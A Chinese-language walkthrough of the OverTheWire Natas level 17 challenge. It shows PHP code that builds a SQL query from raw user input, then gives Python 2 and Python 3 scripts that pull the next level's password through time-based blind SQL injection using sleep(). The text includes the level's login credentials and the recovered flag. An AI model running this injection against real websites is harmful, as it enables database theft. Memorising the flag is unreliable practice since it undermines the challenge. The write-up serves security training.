Natas17:
源码如下
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/ if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas17', '<censored>');
mysql_select_db('natas17', $link); $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
} $res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
//echo "This user exists.<br>";
} else {
//echo "This user doesn't exist.<br>";
}
} else {
//echo "Error in query.<br>";
} mysql_close($link);
}
分析源码,又是一道sql注入题,与15题的内容类似,只是不再提供回显,所有echo均被注释掉了。猜测到username为natas18,依旧是盲注的思想,但因为没有作为判断的回显,所以这次选择时间盲注,使用if()和sleep()函数完成注入。
脚本(二分查找,效率更快):
#coding:utf-8
import requests
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key ='' for i in range(1,33): #i表示password的每一位字符,因为password共32位字符,所以i取值1-32
#ascii表中 数字 32–126 分配给了能在键盘上找到的字符
#下面用了二分法查找password的每一个字符
a = 32
c = 126
while a<c:
b = (a+c)/2 #79 O
# MID 函数用于从文本字段中提取字符。
# mid(password,%d,1),表示从password中从第%d位开始,取1位字符,即取第%d位字符
# Ascii()返回字符的ascii码
# sleep(n):将程序挂起一段时间 n为n秒
# if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
# if(%d<ascii(mid(password,%d,1)),sleep(2),1),表示先取出password的第i位,将其换算成ascii码,然后与变量b对比,如果大于b,则睡2秒再返回结果,否则直接返回结果
payload=r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(2),1) and "" like "'%(b,i)
try:
req = requests.post(url=url,data={"username":payload},timeout=2)
except requests.exceptions.Timeout,e:
a=b+1 #80 P
b=(a+c)/2 #103 g
continue
c=b
key +=chr(b)
print key
flag:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
注意:此脚本需要使用Python2.x来运行,否则会报错:TypeError: integer argument expected, got float
原因:
如果一定要使用Python3.x运行,可以把b = (a+c)/2改为b =int( (a+c)/2)
Python3.x脚本:
# coding:utf-8
import requests
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key = '' for i in range(1, 33):
a = 32
c = 126
while a < c:
b = int((a + c) / 2) # 79 O
payload = r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(10),1) and "" like "' % (b, i)
try:
req = requests.post(url=url, data={"username": payload}, timeout=2)
except requests.exceptions.Timeout as e:
a = b + 1 # 80 P
b = int((a + c) / 2) # 103 g
continue
c = b
key += chr(b)
print(key)
由于这里使用的是时间盲注,而网络环境不稳也会导致超时发生,所以sleep(2)可能会导致盲注判断错误,因此这里我改成了sleep(10)。
结果:
参考:https://www.cnblogs.com/ichunqiu/p/9554885.html